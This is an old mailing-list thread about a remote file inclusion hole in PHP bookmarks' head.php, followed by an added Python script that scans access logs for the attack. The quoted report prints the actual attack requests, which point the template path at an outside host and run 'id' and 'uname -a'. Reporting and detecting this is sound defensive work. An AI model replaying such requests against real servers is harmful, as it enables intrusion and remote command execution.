From: Phillip S. <ph...@3b...> - 2003-03-24 19:06:08
Is there a patch for this yet?

p.

> -----Original Message-----
> From: apb...@li... [mailto:apb...@li...] On Behalf Of Stefan May
> Sent: March 9, 2003 2:43 PM
> To: apb...@li...
> Subject: [Apb-development] Security Bug
>
> Hi all,
>
> I'm not subscribed to this list, so reply with Cc to me.
>
> Last night my site was hacked using PHP bookmarks. I like
> this program very much, but this time I hated it.
>
> The "bug" is in /bookmarks/templates/head.php, you can set
> the include path through normal http requests. The following
> requests were made:
>
> GET /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://www.madsk8er.hpg.com.br/&cmd=id HTTP/1.1
> GET /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://www.madsk8er.hpg.com.br/&cmd=uname%20-a HTTP/1.1
>
> and some more.
>
> For now I limited access to the template path. I'm not sure
> if I should use Safe Mode for PHP. Is this the better way?
>
> cu,
> Stefan.
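The requests quoted above set APB_SETTINGS[template_path] from the query string and give it a remote URL as its value. The following log check is an added example, not part of the original thread or of PHP bookmarks: it flags access-log lines showing either trait. It assumes Combined Log Format; the sample lines, the placeholder host host.example.invalid, and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A value starting with scheme:// (or a scheme-relative //host) points off the server.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)
# Parameter names that address the application's settings array.
SETTINGS_KEY_RE = re.compile(r'^APB_SETTINGS(?:\[|$)')

# Constructed sample log lines (not taken from the original message).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Mar/2003:02:11:45 +0100] "GET /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://host.example.invalid/&cmd=id HTTP/1.1" 200 512',
    '192.0.2.10 - - [09/Mar/2003:02:12:03 +0100] "GET /bookmarks/templates/head.php?APB_SETTINGS[template_path]=HTTP%3A%2F%2Fhost.example.invalid%2F HTTP/1.1" 200 498',
    '198.51.100.7 - - [09/Mar/2003:09:30:00 +0100] "GET /bookmarks/index.php?group=12 HTTP/1.1" 200 8192',
    '198.51.100.7 - - [09/Mar/2003:09:30:04 +0100] "GET /bookmarks/search.php?q=http+tutorial HTTP/1.1" 200 4096',
]


def findings(line):
    """Return a list of (reason, key, value) tuples for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = urlsplit(m.group("target"))
    if not target.path.lower().endswith(".php"):
        return []
    hits = []
    # parse_qsl percent-decodes names and values, so %5B/%5D become [ and ].
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if SETTINGS_KEY_RE.match(key):
            hits.append(("settings-override", key, value))
        if REMOTE_VALUE_RE.match(value):
            hits.append(("remote-url-value", key, value))
    return hits


def scan(lines):
    """Map 1-based line number -> findings, for lines with at least one hit."""
    return {n: f for n, line in enumerate(lines, 1) if (f := findings(line))}


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        for reason, key, value in hits:
            print(f"line {lineno}: {reason}: {key}={value}")
```
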